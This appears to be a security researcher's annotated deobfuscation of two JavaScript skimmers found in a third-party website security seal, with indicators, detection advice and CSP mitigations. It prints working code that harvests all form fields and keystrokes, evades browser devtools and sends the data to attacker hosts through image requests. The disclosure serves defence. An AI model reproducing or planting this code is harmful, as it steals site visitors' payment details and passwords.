BestOfTheWeb.com Security Seal contains not one but two different keystroke sniffers (2019-05-13). Obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
// State object of the first decoded sniffer (form-field collector).
var sniffData = {}; | |
// Gate: the remote collection endpoint every captured payload is sent to.
// This URL is the network indicator for this sniffer (egress logs, CSP reports, blocklists).
sniffData['Gate'] = 'https://font-assets.com/img'; | |
// Data: captured field values keyed by the field's id or name.
sniffData['Data'] = {}; | |
// Sent: hashes of payloads already transmitted, used by SendData to avoid repeats.
sniffData['Sent'] = []; | |
// ![] evaluates to false: nothing is sent until SaveParam sees a value that passes its checks.
sniffData.IsValid = ![]; | |
// Records one form field's value in sniffData.Data, keyed by field.id, or by field.name
// when the field has no usable id. Values that are empty or 256 (0x100) characters and
// longer are ignored.
// The value, with '-' and ' ' removed, is run through two checks (_0x5c4ab6 and _0xdc5c77)
// whose definitions are not part of this listing; when both pass, IsValid is set to true.
// NOTE(review): _0x5e7b89 looks like a replace-all helper and the two checks presumably
// recognise a payment-card number (digits/length and a checksum) - confirm against the
// obfuscated original.
sniffData.SaveParam = function(field) { | |
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) { | |
// The unbraced `if` only sets the flag; the value on the next line is stored either way.
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![]; | |
sniffData.Data[field.id] = field.value; | |
return; | |
} | |
// Same logic as above, keyed by the field's name attribute.
if (field.name !== undefined && field.name != '' && field.name !== null && field.value.length < 0x100 && field.value.length > 0x0) { | |
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![]; | |
sniffData.Data[field.name] = field.value; | |
return; | |
} | |
}; | |
// Passes every <input>, <select> and <textarea> in the document to SaveParam.
// Scope of exposure: the collection is not limited to payment fields, so any form value
// present on a page that loads this script (names, addresses, passwords) ends up in
// sniffData.Data once it meets SaveParam's id/name and length conditions.
sniffData.SaveAllFields = function() { | |
var inputfields = document.getElementsByTagName('input'); | |
var selectfields = document.getElementsByTagName('select'); | |
var textareas = document.getElementsByTagName('textarea'); | |
for (var i = 0; i < inputfields.length; i++) sniffData.SaveParam(inputfields[i]); | |
for (var i = 0; i < selectfields.length; i++) sniffData.SaveParam(selectfields[i]); | |
for (var i = 0; i < textareas.length; i++) sniffData.SaveParam(textareas[i]); | |
}; | |
// Serialises the captured fields and hands them to LoadImage, unless the same payload
// was already sent.
// Analysis note: sending is skipped while window.devtools.isOpen is truthy, so the request
// does not appear in the browser's own network panel. window.devtools is not defined in
// this listing (presumably set by a devtools-detection snippet in the original - confirm).
// Capture traffic with an intercepting proxy or from network logs instead.
sniffData['SendData'] = function() { | |
if (!window.devtools.isOpen && sniffData.IsValid) { | |
// The victim site's hostname is added to the payload.
sniffData.Data.Domain = location.hostname; | |
// Encoding chain: JSON -> base64 -> URL-encoding. Reverse it to decode a captured request.
var _0x43c1ef = encodeURIComponent(window.btoa(JSON.stringify(sniffData.Data))); | |
// hashCode() is not a built-in String method; it must be added elsewhere in the original script.
var _0x2c70f7 = _0x43c1ef.hashCode(); | |
// Dedupe: stop if this exact payload was already transmitted.
for (var _0x3cbd0c = 0x0; _0x3cbd0c < sniffData.Sent.length; _0x3cbd0c++) | |
if (sniffData.Sent[_0x3cbd0c] == _0x2c70f7) return; | |
sniffData.LoadImage(_0x43c1ef); | |
} | |
}; | |
// One polling cycle: re-read all form fields, then attempt to send the result.
// Invoked on a timer by the onreadystatechange handler at the end of this listing.
sniffData.TrySend = function() { | |
sniffData.SaveAllFields(); | |
sniffData.SendData(); | |
}; | |
// Transmits one payload: records its hash in Sent, then creates an IMG element and sets
// its src to the gate URL, which makes the browser issue a GET request.
// The element is never attached to the document, so nothing appears in the page DOM.
// Mitigation: because the data leaves as an image load, a Content-Security-Policy whose
// img-src does not allow the gate's origin blocks this request.
sniffData.LoadImage = function(_0x3e43b7) { | |
sniffData.Sent.push(_0x3e43b7.hashCode()); | |
var _0x2d7e85 = document.createElement('IMG'); | |
_0x2d7e85.src = sniffData.GetImageUrl(_0x3e43b7); | |
}; | |
// Builds the request URL: the gate address followed by the payload in a `reff` query parameter.
// Detection: look for requests to the gate whose `reff` value is a long URL-encoded base64 string.
sniffData.GetImageUrl = function(_0x51c1cf) { | |
return sniffData.Gate + '?reff=' + _0x51c1cf; | |
}; | |
// Starts the collector once the document has finished loading: TrySend then runs every
// 500 ms (0x1f4) for as long as the page stays open.
// Assigning document.onreadystatechange replaces any handler the host page had set there.
document.onreadystatechange = function() { | |
if (document.readyState === 'complete') { | |
window.setInterval(sniffData.TrySend, 0x1f4); | |
} | |
} |
// (c) Decoded by Sanguine Security | |
// Second decoded sniffer: a key-press logger, independent of the form-field collector.
// keystrokes: buffer of typed characters that have not been sent yet.
var keystrokes = ''; | |
// sniffURL: collection endpoint; the typed characters are appended after `c=`.
// This URL is the network indicator for this sniffer.
var sniffURL = 'https://dt2td.com/jsk/imgtrack.php?c='; | |
// Appends the character of every key press on the document to the keystrokes buffer,
// regardless of which field has focus.
// `get` and `key` are assigned without a declaration, so in non-strict code they become
// properties of window. NOTE(review): their presence on a live page may serve as a
// secondary artefact - confirm.
// Assigning document.onkeypress replaces any handler the host page had set there.
document.onkeypress = function (keypress) { | |
// Use the legacy window.event when the browser provides it, else the handler argument.
get = window.event ? event : keypress; | |
key = get.keyCode ? get.keyCode : get.charCode; | |
key = String.fromCharCode(key); | |
keystrokes += key; | |
}; | |
// Flush loop: when the buffer is non-empty, sends it through an image request to sniffURL
// and clears it.
// No delay is passed to setInterval, so the callback runs as often as the browser allows
// and typed characters leave the page almost immediately, in small fragments.
// Detection: the buffer is appended without URL-encoding, so proxy or server logs show
// requests to imgtrack.php whose `c` parameter holds the typed text in readable form.
// Mitigation: as an image load, this is blocked by a Content-Security-Policy whose img-src
// does not allow the endpoint's origin.
window['setInterval'](function () { | |
if (keystrokes.length > 0) { | |
new Image()['src'] = sniffURL + keystrokes; | |
keystrokes = ''; | |
} | |
}) |